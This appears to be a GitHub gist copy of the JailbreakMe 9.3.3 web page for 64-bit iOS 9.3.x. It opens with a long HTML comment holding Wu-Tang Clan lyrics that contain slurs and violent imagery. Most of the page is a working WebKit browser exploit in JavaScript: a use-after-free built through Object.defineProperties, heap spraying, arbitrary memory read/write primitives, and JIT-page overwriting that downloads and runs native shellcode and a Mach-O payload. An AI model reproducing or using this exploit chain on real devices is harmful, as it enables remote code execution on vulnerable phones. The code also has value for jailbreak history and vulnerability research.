Skip to content

Instantly share code, notes, and snippets.

@twodayslate
Last active June 6, 2021 03:02
Show Gist options
  • Save twodayslate/6b033f633d828dff045587e33377e1a1 to your computer and use it in GitHub Desktop.
Save twodayslate/6b033f633d828dff045587e33377e1a1 to your computer and use it in GitHub Desktop.
jbme 9.3.3 qwertyoruiop.com
<!--
This is licensed under the Anyone But Stefan Esser license.
---
PLZ NO RCE.
sorry 4 indentation but i was using nano lmao
---
The game of chess, is like a sword fight
You must think first, before you move
Wu style is immensely strong, and immune to nearly any weapon
When it's properly used, it's almost invincible
Raw I'ma give it to ya, with no trivia
Raw like cocaine straight from Bolivia
My hip hop will rock and shock the nation
Like the Emancipation Proclamation
Weak MC's approach with slang that's dead
You might as well run into the wall and bang your head
I'm pushin' force, my force your doubtin'
I'm makin' devils cower to the Caucus Mountains
Well I'm a sire, I set the microphone on fire
Rap styles vary, and carry like Mariah
I come from the shaolin slum, and the isle I'm from
Is comin' through with nuff niggas, and nuff guns
So if you want to come sweatin', stressin' contesting
You'll catch a sharp sword to the midsection
Don't talk the talk, if you can't walk the walk
Phony niggas are outlined in chalk
A man vexed, is what the projects made me
Rebel to the grain there's no way to barricade me
Steam-rollin' niggas with the eighteen wheeler
With the drunk driver drivin', there's no survivin'
Ruff like Timberland wear, yeah
Me and the Clan, and yo the Landcruisers out there
Peace to all the crooks, all the niggas with bad looks
Bald heads, braids, blow this hook
We got chrome tecs, nickel plated macs
Black axe, drug dealin' styles in phat stacks
I only been a good nigga for a minute though
'Cause I got to get my props, and win it yo
I got beef wit commercial-ass niggas with gold teeth
Lampin' in a Lexus eatin' beef
Straight up and down don't even bother
I got forty niggas up in here now, who kill niggas fathers
My peoples are you with me where you at?
In the front, in the back killa-bees on attack
My peoples are you with me where you at?
Smokin meth hittin caps on the block with the gats
Here I go, deep type flow
Jacque Cousteau could never get this low, I'm
Cherry bombin' shits boom!
Just warmin' up a little bit, vroom vroom
Rappinin is what's happenin'
Keep the pockets stacked and then, hands clappin' and
At the party when I move my body
Gotta get up, and be somebody
Grab the microphone put strength to the bone
Duh, duh, duh enter the Wu-Tang zone
Sure enough when I rock that stuff
Huff puff I'm gonna catch your bluff tuff
Rough, kickin' rhymes like Jim Kelly
Or Alex Haley I'm a Mi Beetle Bailey rhymes
Comin' raw style, hardcore
Niggas be comin' to the hip-hop store
Comin' to buy grocery from me
Tryin' to be a hip-hop MC
The law, in order to enter the Wu-Tang
You must bring the Ol Dirty Bastard type slang
Represent the Gza, Abbot, RZA, Shaquan, Inspecta Deck
Dirty hoe gettin' low wit his flow
Introducin' the Ghostface Killer
No one could get illa
My peoples are you with me where you at?
In the front, in the back killa-bees on attack
My peoples are you with me where you at?
Smokin meth hittin caps on the block with the gats
Speakin' of the devil psych, no it's the God, get the shit right
Mega trife, and yo I killed you in a past life
On the mic while you was kickin' that fast shit
You reneged tried again, and got blasted
Half mastered ass style mad ruff task
When I struck I had on Tims and a black mask
Remember that shit? I know you don't remember jack
That night yo I was hittin' like a spiked bat
And then you thought I was bugged out, and crazy
Strapped for nonsense, after me became lazy
Yo, nobody budge while I shot slugs
Never shot thugs, I'm runnin' with thugs that flood mugs
So grab your eight plus one, start flippin' and trippin'
Niggas is jettin' I'm lickin' off son
Wu, Tang, Wu, Tang, Wu, Tang, Wu, Tang!
Homicide's illegal and death is the penalty
What justifies the homicide, when he dies?
In his own iniquity it's the
Master of the Mantis Rapture comin at cha
We have an APB on an MC Killer
Look like the work of a Master
Evidence indicates that's it's stature
Merciless like a terrorist hard to capture
The flow changes like a chameleon
Plays like a friend, and stabs you like a dagger
This technique attacks the immune system
Disguised like a lie paralyzin' the victim
You scream, as it enters your bloodstream
Erupts your brain from the pain these thoughts contain
Movin' on a nigga with the speed of a centipede
And injure any motherfuckin' contender
My peoples are you with me where you at?
In the front, in the back killa-bees on attack
My peoples are you with me where you at?
Smokin meth hittin caps on the block with the gats
---
Shaolin shadowboxing, and the Wu-Tang sword style
If what you say is true,
The Shaolin and the Wu-Tang could be dangerous
Do you think your Wu-Tang sword can defeat me?
En garde, I'll let you try my Wu-Tang style
Bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Bring da mother, bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Ghostface, catch the blast of a hype verse
My glock bursts, leave in a hearse, I did worse
I come rough, tough like an elephant tusk
Ya head rush, fly like Egyptian musk
Aw shit, Wu-Tang Clan spark the wicks an'
However, I master the trick just like Nixon
Causin' terror, quick damage ya whole era
Hardrocks is locked the fuck up, or found shot
P.L.O. style, hazardous, cause I wreck this dangerous
I blow sparks like Waco, Texas
I watch my back like I'm locked down, hardcore
Hittin' sound, watch me act bugged, and tear it down
A literate type asshole, songs goin' gold, no doubt
And you watch a corny nigga fold
Yeah, they fake and all that
Carryin' gats but yo, my Clan
Rollin like forty Macs
Now ya act convinced, I guess it makes sense
Wu-Tang, yo sew, represent
I wait for one to act up
Now I got him backed up
Gun to his neck now, react what?
And that's one in the chamber
Wu-Tang banger, 36 styles of danger
Bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Bring da mother, bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
I rip it hardcore, like porno-flick bitches
I roll with groups of ghetto bastards with biscuits
Check it, my method on the microphone's bangin'
Wu-Tang slang'll leave your headpiece hangin'
Bust this, I'm kickin' like Segal, Out For Justice
The roughness, yes, the rudeness, ruckus
Redrum, I verbally assault with the tongue
Murder one, my style shot ya knot like a stun-gun
I'm hectic, I wreck it with the quickness
Set it on the microphone, and competition get blown
By this nasty ass nigga with my nigga, the RZA
Charged like a bull and got pull like a trigga
So bad, stabbin' up the pad with the vocab, crab
I scream on ya ass like your dad, bring it on
Bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Bring da mother, bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Yo, I'm more rugged than slave man boots
New recruits, I'm fuckin' up MC troops
I break loops, and trample shit, while I stomp!
A mud hole in that ass, cause I'm straight out the swamp
Creepin' up on site, now it's Fright Night
My Wu-Tang slang is mad fuckin' dangerous
And more deadly than the stroke of an axe
Choppin' through ya back swish
Givin' bystanders heart-attacks
Niggas try to flip, tell me who is him
I blow up his fuckin' prism
Make it a vicious act of terrorism
You want to bring it, so fuck it
Come on and bring the ruckus
And I provoke niggaz to kick buckets
I'm wettin' cream, I ain't wettin' fame
Who sellin' gain, I'm givin' out a deadly game
It's not the Russian it's the Wu-Tang crushin'
Roulette, slip up and get fucked like Suzette
Bring da fuckin' ruckus
Bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
Bring da mother, bring da motherfuckin' ruckus
Bring da motherfuckin' ruckus
So bring it on
So bring it on
So bring it on
So bring it on
So bring it on
So bring it on
So bring it on
Punk nigga!
--!>
<html manifest="off.appcache">
<head>
<title>JailbreakMe 9.3.3</title>
<meta name="viewport" content="user-scalable=1.0,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
<meta name="apple-mobile-web-app-capable" content="no">
<meta name="format-detection" content="telephone=no">
<link rel="apple-touch-icon" href="touch-icon-iphone.png">
<meta name="apple-mobile-web-app-title" content="JailbreakMe" />
<style>
body {
overflow: hidden;
position: fixed;
position: relative;
}
h1{
overflow: hidden;
position: fixed;
position: absolute;
top: 40%;
left: 50%;
transform: translate(-50%, -50%);
}
footer {
position: absolute;
left: 0;
bottom: 0;
height: 40px;
width: 100%;
overflow:hidden;
}
</style>
</head>
<body>
<script>
function load_binary_resource(url) {
var req = new XMLHttpRequest();
req.open('GET', url, false);
req.overrideMimeType('text\/plain; charset=x-user-defined');
req.send(null);
if (req.status != 200) {
document.write("fail downloading loader");
stop = 1
};
return req.responseText;
}
var mem0 = 0;
var mem1 = 0;
var mem2 = 0;
function read4(addr) {
mem0[4] = addr;
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) {
mem0[4] = addr;
mem2[0] = val;
mem0[4] = mem1;
}
filestream = load_binary_resource("exec_fv")
var shll = new Uint32Array(filestream.length / 4);
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
shll[i / 4] = word;
i += 4;
}
var print = alert;
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
var pressure = new Array(100);
var bufs = new Array(10000);
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
function swag() {
if (bufs[0]) return;
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
dgc();
for (i = 0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2)
for (k = 0; k < bufs[i].length;) {
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
}
var trycatch = "";
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);
var fcp = 0;
var smsh = new Uint32Array(0x10)
function smashed(stl) {
document.body.innerHTML = "win! " + smsh.length;
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]);
write4(jitf, 0xd28024d0);
write4(jitf + 4, 0x58000060);
write4(jitf + 8, 0xd4001001);
write4(jitf + 12, 0xd65f03c0);
write4(jitf + 16, jitf + 0x20);
write4(jitf + 20, 1);
fc();
var dyncache = read4(jitf + 0x20);
var dyncachev = read4(jitf + 0x20);
var go = 1;
while (go) {
if (read4(dyncache) == 0xfeedfacf) {
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
{
go = 0;
break;
}
}
}
dyncache += 0x1000;
}
dyncache -= 0x1000;
var bss = [];
var bss_size = [];
for (i = 0; i < 0x1000 / 4; i++) {
if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
bss_size.push(read4(dyncache + i * 4 + (0x28)));
}
}
var shc = jitf;
var filestream = load_binary_resource("loader")
for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
write4(shc, word);
shc += 4;
i += 4;
}
jitf &= ~0x3FFF;
jitf += 0x8000;
write4(shc, jitf);
write4(shc + 4, 1);
// copy macho
for (var i = 0; i < shll.length; i++) {
if(shll[i] == 0x44556677) {
var k=new ArrayBuffer(8*6);
var k8=new Uint8Array(k);
var k32=new Uint32Array(k);
var str=prompt("Real build number:", "13F69");
for(var si=0; si<str.length; si++) k8[si] = str.charCodeAt(si);
for(var si=0; si<k32.length; si++) shll[i+si] = k32[si];
break;
}
}
for (var i = 0; i < shll.length; i++) {
if(shll[i] == 0x33553377) {
var k=new ArrayBuffer(8*6);
var k8=new Uint8Array(k);
var k32=new Uint32Array(k);
var str=prompt("Real version:", "9.3.2");
for(var si=0; si<str.length; si++) k8[si] = str.charCodeAt(si);
for(var si=0; si<k32.length; si++) shll[i+si] = k32[si];
break;
}
}
for (var i = 0; i < shll.length; i++) {
write4(jitf + i * 4, shll[i]);
}
alert("All set. Close this alert and lock your screen to continue. See you on the other side!")
for (var i = 0; i < bss.length; i++) {
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
write4(bss[i] + k * 4, 0);
}
}
fc();
alert(2);
}
function go() {
document.body.innerHTML = "<center><h1>doing it</h1>by <a href='https://twitter.com/qwertyoruiopz'>qwertyoruiopz</a> & <a href='http://pangu.io'>pangu team</a>, for iOS 9.3.x<br />may take multiple tries, 64 bit only<br />tyvm NSO, sick 0day (at the time)</center>";
dgc();
setTimeout(go_, 400);
}
function go_() {
if (smsh.length != 0x10) {
smashed();
return;
}
dgc();
var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
var props = {
p0: {
value: 0
},
p1: {
value: 1
},
p2: {
value: 2
},
p3: {
value: 3
},
p4: {
value: 4
},
p5: {
value: 5
},
p6: {
value: 6
},
p7: {
value: 7
},
p8: {
value: 8
},
length: {
value: not_number
},
stale: {
value: arr
},
after: {
value: 666
}
};
var target = [];
var stale = 0;
var before_len = arr.length;
Object.defineProperties(target, props);
stale = target.stale;
stale[0] += 0x101;
stale[1] = {}
for (var z = 0; z < 0x1000; z++) fc();
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
stale[0] = fc;
fcp = bufs[i][k];
stale[0] = {
'a': u2d(105, 0x1172600),
'b': u2d(0, 0),
'c': smsh,
'd': u2d(0x100, 0)
}
stale[1] = stale[0]
bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh
bck = stale[0][4];
stale[0][4] = 0; // address, low 32 bits
// stale[0][5] = 1; // address, high 32 bits == 0x100000000
stale[0][6] = 0xffffffff;
mem0 = stale[0];
mem1 = bck;
mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) {
smashed(stale[0]);
}
return;
}
}
}
document.location.reload();
}
</script>
<center><a href="javascript:go()"><h1>go</h1></a>by <a href='https://twitter.com/qwertyoruiopz'>qwertyoruiopz</a> & <a href='http://pangu.io'>pangu team</a>, for iOS 9.3.x<br />may take multiple tries, 64 bit only<br />tyvm NSO, sick 0day (at the time)</center>
<footer><center><a href="cydia://url/https://cydia.saurik.com/api/share#?source=https://jbme.qwertyoruiop.com">Add repo for 'jbmepatch', a tweak that fixes this vulnerability.</a></center></footer>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment